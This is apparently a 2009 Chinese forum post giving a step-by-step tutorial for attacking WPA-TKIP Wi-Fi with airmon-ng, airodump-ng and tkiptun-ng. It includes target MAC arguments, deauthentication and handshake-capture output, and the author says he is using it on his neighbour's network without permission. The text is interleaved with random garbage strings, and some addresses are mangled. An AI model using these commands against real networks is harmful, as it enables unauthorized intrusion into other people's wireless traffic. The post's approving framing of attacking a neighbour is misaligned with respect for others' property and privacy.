中尉
- 注册时间
- 2009-1-20
- 金币
- 267 个
- 威望
- 24 个
- 荣誉
- 7 个
尚未签到
|
本帖最后由 ji8635382 于 2009-3-3 17:59 编辑
$ P( Q, ^% ^# u- D/ r6 x& K. G$ F* k A9 u( e) v/ S$ a
ErikTews将在东京的PacSec大会上,演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解。EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据,Tews找到了无需用字典攻击法,来破解临时密钥完整性协议(TKIP)的方法。
3 C" h# N6 N) O* u# i下面就是进行破解的步骤 我参考国外的论坛写的!
) {# i- s+ X; V2 Q2 K首先要具备3点必备的攻击条件1 E9 c+ e/ S/ ]$ N" s/ W, Z( m
1 客户端和接入点必须使用WPA TKIP 而且客户端必须连接 " n* Q3 j8 Y7 D) ?! {* A4 t5 H
2 客户端和接入点必须使用的网络协议地址的IPv4
& G9 }, X$ X7 V7 D' Q3一个长期存在的时间延长键(重新输入间隔)必须设定的接入点。在大多数调制解调器/无线路由器使用TKIP ,这一时期是默认情况下设置为3600秒,从而使攻击
8 [. X2 \3 R7 \: I! a: f以上3点基本上是没有问题了下面是就是攻击了
: E7 l$ a' e$ Q# Sairmon-ng a 首先把网卡监视模式打开:输入airmon-ng start wlan0 注意我的网卡端口是wlan0不同的网卡端口都不一样可以用ifconfig -a 进行查看/ }( \( }4 `7 I3 ^4 g
输入后出现的内如如下' V0 [8 e* V, k- `" A# w
PID Name
4 u% e& }- E9 C$ k$ ~1 M% a2954 dhcpcd6 }) }. H, I- Z
, h# Q# b& I0 P
. U' A& c) O; f6 Y1 x$ v
Interface Chipset Driver
- u3 d0 u, R C. V( ]8 Y/ R' p& L! i
0 g% ^& d& W/ X. N: p( S9 c+ ]wlan0 RTL8187 r8187 (monitor mode enabled)8 H* M0 P% z6 O* \% n* w
不需要另外安装tkiptun-ng bt3正式版有自带的% z1 X* ~2 p0 i/ r
2楼有最新的aircrack工具里面有带tkiptun-ng工具4 c' x9 |/ H4 p! T4 p$ l
介绍下tkiptun-ng工具
- k2 o8 \# F! Z& G- Z& L, M
- q- h( X0 Y& T; i. fFilter options:过滤器的!
8 [% t$ j3 r; r" D6 c+ `6 |! Q& [, }0 M) I4 M
-d dmac : MAC address, Destination
. {( _0 e$ ?4 R+ Z8 |. |' Y -s smac : MAC address, Source
) p. }& F# A) T, n/ l6 i+ `/ A) F, c -m len : minimum packet length
; _5 s9 d3 E3 Y7 g+ }9 r) S+ ^ -n len : maximum packet length
' o! W, S% [) N4 e/ b2 m8 A -t tods : frame control, To DS bit% a) z5 M, b: v% p
-f fromds : frame control, From DS bit* ~6 O# T; ]! b( B- F
-D : disable AP detection
7 P: z% G1 [+ I% L
! `4 j( |; X& h) K Replay options:攻击的!" a& N) }+ T8 f& @
3 E3 d9 U! D- n# X0 i/ e -x nbpps : number of packets per second1 P; R7 c- K4 |* v8 r& R1 A) P
-a bssid : set Access Point MAC address; F" I7 [, [3 Y% Q
-c dmac : set Destination MAC address
9 Z7 E0 K# W( r+ k3 `4 }, x -h smac : set Source MAC address- ~. U$ ]$ Y- U6 `
-F : choose first matching packet. c9 O% d" C6 ~4 C
-e essid : set target AP SSID
4 Q6 {- l C0 k2 h7 \6 M$ o2 `0 K% k: B/ G
Debug options:调试的!
4 w7 x; ~: c2 O* y8 G -K prga : keystream for continuation
9 f1 F8 o0 T0 T8 j -y file : keystream-file for continuation
: r0 F" B8 V) x9 g& p: b -j : inject FromDS packets- M4 `" T# |0 P. H3 e
-P pmk : pmk for verification/vuln testing4 @7 W9 K- }# V
-p psk : psk to calculate pmk with essid8 {9 a6 y# N# l8 q) [! {' X) Q
* `6 r9 U7 ? b" A8 r source options: 这个不太清楚 。:)呵呵
# O) {* T* F( u2 V
- \% z# V6 Z7 _& b. F8 A -i iface : capture packets from this interface; I! _; f5 I9 P' V% i; d4 K" n
-r file : extract packets from this pcap file# H: e- a4 t, S' z9 D) h" ?
1 t6 b* ]" o, w6 I; U# \# W' i' \ --help : Displays this usage screen
# p$ Q5 v3 S0 \7 f4 T x1 n: h8 n4 ~8 G7 O/ i
这个使用 airodump-ng -w 1 wlan0 这个就不解释了, {- b8 A C( k* ]+ }0 R, B( j1 G& H
" T( I4 [0 N# j' s% K7 f
我看下图1有一个essid为linksys的ap底下也有正常的客服端 这个我在上面注意已经强调了必需要有。
, \8 U; i6 E9 I0 n; S然后我们在打开一个 shell 下面开始tkiptun-ng的命令
1 M7 d/ ?7 Z( ?2 p* R" mtkiptun-ng wlan0 -a 00:0C:41 3:12:81 -h 00:12:F0:6F:ED:38 wlan0 是我的端口 -a 是我们要工具的ap mac地址 使用airodump-ng工具时可以看到 -h 是我们自己的 mac地址用 ifconfig -a 可以查到 记入监视模式要忽略掉后面的0 接着我们可以看到图2的内容我们可以看到图上写着 注入成功 等待信号 拿到握手包 等等的内容
+ d& ~. X' T' ?! E最后就等待ARP协议数据包的收集了
7 {+ T0 R( l4 `2 { Z2 k" d/ f$ m" N6 o
以上就是攻击的方式了: r! }" q8 }6 E n3 \
" ?0 R% V- _6 T. Q: A2 m4 ^/ w& e0 `3 a
呵呵我也不知道出了问题还是我遗漏了什么或者可能是我的配置是问题,tkiptun-ng攻击一直在等待数据包气死我了 但是看老外也有成功注入的人希望你们也可以成功 tkiptun-ng还是测试版 我想正式版出来应该可以解决很多问题的! 希望大家对tkiptun-ng能多点关注 wpa的破解是有明天的 哈哈哈哈哈哈哈!!!!!!!!% u; |+ [+ r2 H. _
9 d5 }" Z% T" m O* {( f- y
. T* }7 F6 ?; R8 @* w
0 u' N, G; @1 v5 V4 |: Y
- }) A! _3 e$ ^! K& \
' G+ i4 W* k& ^% D
+ x1 K, \0 |% H3 N8 p, s" _) |) \* }7 [/ L
1 L" Y. q1 @: C+ h
" ]5 f. @8 R; o, T+ M* a7 c& b( b' X
# z: n- w% E- ]5 Q- l
: Q4 m3 h% p/ ~# G J+ z1 b) }2 C; H6 g5 L5 r( @. k
- l' T5 X" z$ j# B
+ q$ v1 c0 A0 y7 u
1 t( X) p) m" ?- n* g. g J9 i* E2 t
0 I* n# U$ c( v+ o M% W9 k9 \/ r. j8 E
6 H% i7 f. z% R
# I! G4 O% \3 v0 J
9 t9 Y0 [6 ?: O# U- {- ~! e :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: 4 n% e$ N, b+ `/ O. R" T/ h$ B- C: N
% `: K9 j8 A" F7 M; c6 E' v3 c
底下是新写的哦! 本教程只作参考任何法律责任我一概不负责。
0 f+ D v$ P* c) D" F+ U! _4 j- U; U! n* l; g+ }1 J
2楼有最新的aircrack工具里面有带tkiptun-ng工具# k2 N9 g/ M7 q3 f' M+ s
& b" D0 O4 x' S5 ]2 a
忙了一上午回家 还是习惯把bt3打开看看回顾上次做的东西 突然有想到了tkiptun-ng因为用airolib-ng做hash表实在耗时间还有就是我邻居他设的wpa2密码实在厉害我已经给他搞的心力交瘁了,可是我有不想放弃比较我在这密码上耗的时间太多了。好了进入正题
# w; e. e; ~$ q& F/ H1 r& U4 b/ x- h- u5 m- e4 g8 ?6 q& [
打开shell输入airodump-ng -w vicino ath1 这个不解释了看不懂我也没有办法。- J6 `9 T# { O. U. u9 ~* |
监视你要破解的wpa-TKIP密码类型的ap记住必需要有客服端的
F; O' e) `% v# T9 p! D! M' T: d关于底下那朋友说的需要更改mac 其实是不需要的 你输入底下的命令后软件自动更改mac6 K! [/ s' A5 g& N4 E) r* s
1 tkiptun-ng -h 00:12:F0:6F:ED:38 -a 00:0C:413:12:81-m 80 -n 100 ath1 我用atheros网卡了所以显示ath1监视端口和上面的不一样,因为这次不是用我的华硕本本 今天用hp的!呵呵! -m 是最小数据包长度 -n 是最大数据包长度 我 80 和100比较稳定其他都效果不佳 这个是真对我ath网卡的其他的自己试试。 -h 写客服端的mac
( u0 `$ R6 `4 p7 Y+ x) b% L5 ?!输入命令后出后会出现下面结果 图我没有办法给你们看了因为那太电脑还在破解中我是用另外的电脑写的希望你们理解!
0 ^& Z, g, Y& t+ t" `' tBlub 2:38 E6 38 1C 24 15 1C CF
7 Q% E! Z5 }3 H9 E/ K# \Blub 1:17 DD 0D 69 1D C3 1F EE
" O9 X$ X' P8 o& }% oBlub 3:29 31 79 E7 E6 CF 8D 5E 如果一直停留在 等待ARP协议数据包 就重新开始因为一直等就没有用的!, @/ T7 R5 N8 t, b
14:48:00 Michael Test: Successful(这个意思是测试成功) 看清楚上面的 blub 1 2 3这个是固定的显示一定要和我写的一样才可以成功 这个工具的握手包没法靠攻击得到大家请慢慢的等 自己用aireplay工具的是无用的我已经式过了。
8 K6 \. M! z+ b: f) @( k5 E& @6 u14:48:00 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 1
' i, U o6 \+ Z6 o" A% d* N14:48:00 Found specified AP
, A7 f6 _: B$ J) r5 @14:48:00 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 2| 4 ACKs]6 Q: g+ U4 `3 C8 a; s. j3 D! i, |
14:48:02 WPA handshake: 00:0C:413:12:81 captured9 d4 i. ?5 K. X8 `; D; q! y1 ]
14:48:02 Waiting for an ARP packet coming from the Client...4 s# V5 H; X( p' a
Saving chosen packet in replay_src-1109-144822.cap4 R1 c T" M! V4 o( B
14:48:22 Waiting for an ARP response packet coming from the AP...
; y, _! Z- S5 CSaving chosen packet in replay_src-1109-144822.cap1 s, A; R- B% S
14:48:22 Got the answer!- l6 b' z' h) {1 m4 b
14:48:22 Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.1 y# k. c5 h+ W# j, T1 k
% |7 }- D# C) ^2 K
Sent 80 packets, current guess: 37.. 看到了吗?和上面的不一样哦!呵呵 现在开始猜密码了,你们有没有注意它写什么发包猜测 也就是说这软件是攻击ap在获取wpa的密码信息 这那我想到破解wep了!呵呵 现在猜了37次了 密码还没出现看来我邻居的密码真的很复杂啊! - o% y8 K$ j2 z
2 w$ {. M0 l5 L' N' O1 T
hirte成员还没有公布正式的方法这些都是乱搞的!在东京大会上是15钟破解而我现在都用了1个小时还没有密码 现在只能等待正式版
" h' O" l& T. I' F' b& d% }+ U; _ 我现在电脑已经猜了58次 还没有出现密码 大家保佑我,如果出现密码会和大家说的 还有一个要注意客服端必需一直在线不然就无法用它攻击了。哎!!~~~~ |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2009-2-27 07:55
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2009-2-27 08:21
